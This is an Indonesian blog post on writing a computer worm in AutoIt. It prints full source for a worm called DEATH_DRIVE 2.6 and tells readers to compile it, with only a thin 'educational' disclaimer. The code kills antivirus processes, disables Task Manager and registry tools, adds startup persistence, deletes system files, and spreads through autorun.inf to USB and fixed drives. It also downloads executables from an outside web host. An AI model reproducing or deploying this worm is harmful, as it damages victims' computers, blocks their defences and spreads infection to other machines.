Animasi n Sahring

Ads 468x60px

Giusto odio dignissimos

Giusto odio dignissimos

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Omnis dolor repellendus

Omnis dolor repellendus

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Olimpedit quo minus

Olimpedit quo minus

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Itaque earum rerum

Itaque earum rerum

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Epudiandae sint molestiae

Epudiandae sint molestiae

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Sahut aut reiciendis

Sahut aut reiciendis

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More

Kamis, 05 April 2012

MEmbuat Script Virus Dengan Autoit Script

+++++++++++++
//* INTRO *//
+++++++++++++

banyak orang yang tertarik untuk membuat virus serta antivirus untuk menunjukkan
kehebatannya dalam ilmu programming, membalas dendam, atau mungkin menolong orang dan kemungkinan paling banyak adalah karena iseng.

sudah banyak anak SMP, SMA yang sudah mulai tertarik akan dunia komputer, baik hanya untuk
main Online game atau tertarik untuk programming (seperti saya :D). virspector udah SMP blum yak?? :DD

Bagi mereka yang hanya bermain game online tanpa mengetahui seluk beluk komputer,
mereka tidak tau jika username dan password mereka sewaktu-waktu bisa di curi,
dan seperti biasa, jika itu telah terjadi, merka kan menangis, bertanya, atau mungkin berlalu
begitu saja.

Jika mereka tertarik denagn programming, mereka pasti memiliki jalan pikiran serta logika
yang relatif berbeda dengan teman-teman di sekitar mereka. dan tak jarang, mereka di anggap
sebagai orang aneh oleh orang-orang di sekitar mereka.


++++++++++++
//* Inti *//
++++++++++++

Banyak anak anak yang tertarik dengan virus komputer (tepatnya WORM) dan mencoba mencari source
code worm di internet untuk bermain-main, atau sekedar ingin tau. mereka terlalu malas untuk belajar
programming dan mengembangkan logika mereka sendiri. dan tak jarang keingintahuan mereka membawa
dampak yang lumayan serius (coba pikir, jika mereka menjalankan code yang baru saja mereka temui dan ternyata code tersebut adalah varian dari w32/kspoold. waw... saya yakin, orang tua mereka pasti marah besar, terang saja marah. dokumen penting yang ada di komputer pasti terenkrip dan sulit terbaca).


langsung saja......

saya hanya ingin berbagi.
beberapa waktu lalu saya memiliki pikiran aneh (sarap :D) dan terpikirkan oleh saya untuk menuliskan kode worm.
dan inilah hasilnya....


kode ini hanya untuk di pelajari, bukan untuk permainan. jika kalian tau resikonya, silakan di pelajari, jika kalian tidak tau resiko dari code ini. STOP.!!!! berhenti membaca dan navigasikan browser kamu keluar dari halaman ini.


kode ini di tulis dalam bahasa AUTOIT (www.autoitscript.com).. pelajari terlebih dulu tentang autoit, baru pelajari kode ini karena penjelasan yang saya berikan cuma seadanya [maaf.. saya adalah orang yang malas menjelaskan :DD].


;//* ====================  C O D E  S T A R T  F R O M  H E R E  ============================== *//;

; ==============================
====== ;
;         DEATH_DRIVE 2.6              ;
;      ---------------------           ;
; written by poet_freak a.k.a poetro   ;
; only for educational purpose only    ;
; this code is given freely            ;
; without any warranty, use it at      ;
; your own risk                        ;
; december, 14 - 2008, 15.44 pm        ;
;all rights reversed                        ;
; ==================================== ;

Opt("trayiconhide" ,1)  ; hide systemtray icon

if ProcessExists("explorer.exe") = true Then    ;check the process, if explorer.exe exist
    Run(@windowsdir & "deathdrive_daemon.exe")  ; run C:\windows\deathdrive_daemon.exe
EndIf

While 1

if ProcessExists("taskmgr.exe") = true Then ;if taskmanager active = True
    Shutdown(6)   ; force restart computer
endif
If ProcessExists("msconfig.exe") = true Then     ; if msconfig active = true
    shutdown(6)                                    ; force restart
EndIf
ProcessClose("ansav.exe")        ; force close ansav.exe
ProcessClose("pcmav-cln.exe")    ; force close pcmav-cln.exe

$reg1 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"    ; declare var reg1 as HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
$reg2 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"         ; declare var reg2 as HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
    RegWrite ($reg1,"daemon","REG_SZ",@windowsdir &"\p0et.exe")             ; write registry value at $reg1
    RegWrite ($reg1,"Avgsystray","REG_SZ",@windowsdir &"\p0et_freak1.exe")
    RegWrite ($reg1,"esetkrn","REG_SZ",@windowsdir &"\p0et_freak2.exe")
    RegWrite ($reg1,"NvidCpl","REG_SZ",@windowsdir &"\p0et_freak3.exe")
    RegWrite ($reg1,"Msmsgs","REG_SZ",@windowsdir &"\msmsgs.exe")
    Regwrite ($reg2 & "\Explorer\Advanced","SuperHidden","REG_DWORD","0")     ; write registry value at $reg2
    Regwrite ($reg2 & "\Explorer\Advanced","ShowSuperHidden","REG_DWORD","0")
    Regwrite ($reg2 & "\Explorer\Advanced","HideFileExt","REG_DWORD","1")
    Regwrite ($reg2 & "\Explorer\Advanced","Hidden","REG_DWORD","2")
    RegWrite ($reg2 & "\Policies\Explorer","NoFind","REG_DWORD","1")
    Regwrite ($reg2 & "\Policies\Explorer","NoFolderOptions","REG_DWORD","1")
    Regwrite ($reg2 & "\Policies\Explorer","NoDriveTypeAutoRun","REG_DWORD","91")
    RegWrite ($reg2 & "\Policies\Explorer","NoWelcomeScreen","REG_DWORD","1")
    Regwrite ($reg2 & "\Policies\system","DisableTaskMgr","REG_DWORD","1")
    Regwrite ($reg2 & "\Policies\system","DisableRegistryTools","REG_DWORD","1")
    Regwrite ($reg2 & "\Policies\system","ConfirmFileDelete","REG_DWORD","0")
    RegWrite("HKEY_CURRENT_USER\Control Panel\International", "s1159", "REG_SZ", "poet")
    RegWrite("HKEY_CURRENT_USER\Control Panel\International", "s2359", "REG_SZ", "poet")
    RegWrite("HKEY_CURRENT_USER\Control Panel\International\Mouse", "MouseSensitivity", "REG_SZ", "0")
    RegWrite("HKEY_CURRENT_USER\Control Panel\International\Mouse", "SwapMouseButtons", "REG_SZ", "1")

    FileCopy(@ScriptFullPath,@windowsdir & "\msmsgs.exe")         ; create msmsgs.exe at C:\windows
    FileCopy(@scriptfullpath,@windowsdir & "\p0et_freak1.exe")
    FileCopy(@scriptfullpath,@windowsdir & "\p0et_freak2.exe")
    FileCopy(@scriptfullpath,@windowsdir & "\p0et_freak3.exe")
    FileCopy(@ScriptFullPath,@TempDir & "\pagefile.pif")
    FileCopy(@scriptfullpath,@ProgramFilesDir & "\Common Files\D_loader.exe")
    FileSetAttrib(@windowsdir & "\wininit.exe","-R")            ; clear read only attribute
    FileSetAttrib(@windowsdir & "\msmsgs.exe","+R+H+S")         ; create readonly + hidden + system file attribute
    FileSetAttrib(@windowsdir & "\p0et_freak1.exe","+R+H+S")
    FileSetAttrib(@windowsdir & "\p0et_freak2.exe","+R+H+S")
    FileSetAttrib(@windowsdir & "\p0et_freak3.exe","+R+H+S")
    FileSetAttrib(@TempDir & "\pagefile.pif","+S+R+H")
    FileDelete(@windowsdir &"\wininit.exe")                     ; delete C:\Windows\wininit.exe
    FileDelete(@SystemDir & "\MsVbVm60.dll")
  
if FileExists(@WindowsDir &"\autorun.inf") <> True Then             ; check autorun.inf in c:\windows, if not exist,
        $atr = fileOpen(@WindowsDir & "\autorun.inf",2)             ; create autorun.inf in C:\windows, then open C:\windows\autorun.inf
            FileWrite($atr, "[autorun]" & @CRLF)                    ; write [autorun]
            filewrite($atr, "label=Infected.!" &@crlf)                ; write label=infected.! at next line
            FileWrite($atr, "open=d_loader.exe" & @CRLF)
            FileWrite($atr, "shellexecute=d_loader.exe" &@CRLF)
            FileWrite($atr, "shell\Explore\command=d_loader.exe" &@CRLF)
            FileWrite($atr, "shell\Open\command=d_loader.exe" &@CRLF)
            FileWrite($atr, "shell=Explore")
            FileClose($atr)                                            ; close file
            FileSetAttrib(@WindowsDir & "\autorun.inf","+R+H+S")    ; set file attribute to readonly, hidden, system
    EndIf
  
if FileExists(@MyDocumentsDir & "\death-drive ver. 2.6 readme.txt") <> True Then
$atr = FileOpen(@MyDocumentsDir & "\death-drive ver. 2.6 readme.txt",2)
    FileWrite($atr, "to: someone there.... I still love U..." & @CRLF)
    Filewrite($atr, "" & @crlf)
    Filewrite($atr, "aku tak akan panjang lebar," & @crlf)
    Filewrite($atr, " aku hanya ingin tahu jawabmu," & @crlf)
    Filewrite($atr, "mengapa di setiap perkataan yang aku katakan dengan tidak serius, kamu percaya," & @crlf)
    Filewrite($atr, "namun di saat aku jujur dan mengatakan semua yang memang benar terjadi, kau tak percaya." & @crlf)
    Filewrite($atr, "" & @crlf)
    Filewrite($atr, "apa salahku??" & @crlf)
    Filewrite($atr, "mengapa dirimu begitu??" & @crlf)
    Filewrite($atr, "" & @crlf)
    Filewrite($atr, "mengapa sampai segitunya dirimu membenciku??" & @crlf)
    Filewrite($atr, "" & @crlf)
    Filewrite($atr, "01 juni 2009 //* Aku masih sayang padamu *//   p0et" & @crlf)
    FileClose($atr)
EndIf
  
$path1 = DriveGetDrive ("REMOVABLE")
    if Not @error Then
        for $d = 1 to $path1[0]
            $flashdrive = $path1[$d]
            if $flashdrive <> "A:" and DriveGetFileSystem($flashdrive) <> "" Then
                FileSetAttrib($flashdrive & "\autorun.inf","-R")
                FileCopy(@ScriptFullPath,$flashdrive &"\d_loader.exe")
                FileCopy(@WindowsDir & "\autorun.inf",$flashdrive & "\autorun.inf",1)
                FileCopy(@mydocumentsdir & "\death-drive ver. 2.6 readme.txt", $flashdrive & "\death-drive ver. 2.6 readme.txt")
                FileSetAttrib($flashdrive & "\autorun.inf","+R+H+S")
                FileSetAttrib($flashdrive & "\d_loader.exe","+R+H+S")
                ; Search1
                $search1 = FileFindFirstFile($flashdrive & "\*.")
                if $search1 <> -1 Then
                    $file1 = FileFindNextFile($search1)
                        FileCopy(@scriptfullpath,$flashdrive &"\"& $file1 &".exe")
                        FileSetAttrib($flashdrive &"\"& $file1,"+H")
                        FileSetAttrib($flashdrive &"\"& $file1 &".exe","-H-S")
                EndIf
                FileClose($search1)
            EndIf
        Next
    EndIf
    ; Harddisk Drive
    $path2 = DriveGetDrive ("FIXED")
    if Not @error Then
        for $f = 1 to $path2[0]
            $drive = $path2[$f]
                FileSetAttrib($drive & "\autorun.inf","-R")
                FileCopy(@mydocumentsdir & "\death-drive ver. 2.6 readme.txt", $drive & "\death-drive ver. 2.6 readme.txt") ;copy
                FileDelete($drive & "\autorun.inf")
                FileCopy(@scriptfullpath, $drive & "temp.exe")
        Next
    EndIf
  

; *optional, auto-update feature
$webpath = "http://h1.ripway.com/poet_freak/file"            ; declare webpath to download update
    if FileExists(@systemdir & "\p0et_freak1.exe") = True Then    ; check file, if exist download file1.exe from webpath, then rename it to poet_freak1.exe
        InetGet($webpath & "/file1.exe",@SystemDir & "\p0et_freak1.exe")
    EndIf
    if FileExists(@systemdir & "\p0et_freak2.exe") = True Then
        InetGet($webpath & "/file2.exe",@SystemDir & "\p0et_freak2.exe")
    EndIf
    if FileExists(@systemdir & "\p0et_freak3.exe") = True Then
        InetGet($webpath & "/file3.exe",@SystemDir & "\p0et_freak3.exe")
    EndIf
WEnd         ; end of code

;//* ====================  E N D  O F  C O D E ================================= *//;


SILAKAN DI PASTE-kan kode tersebut di scite. kemudin compile dengan parameter sesuai keinginan anda.

SAYA TIDAK MENYARANKAN UNTUK DI JALANKAN DI KOMPUTER TANPA PROTEKSI ANTIVIRUS DENGAN HEURISTIC SYSTEM YANG BENAR-BENAR STABIL
USE THIS CODE AT UR OWN RISK...!!

seperti yang sering dikatakan oleh ANHARKU "kesalahan merupakan bagian dari pembelajaran" waspadalah.! waspadalah.!

heheheheh......

greetz.
* HrXXX
* Anharku
* Garis Miring
* codenesia member
* Poet_freaks Reversing Community

Tidak ada komentar:

Poskan Komentar

Widgeo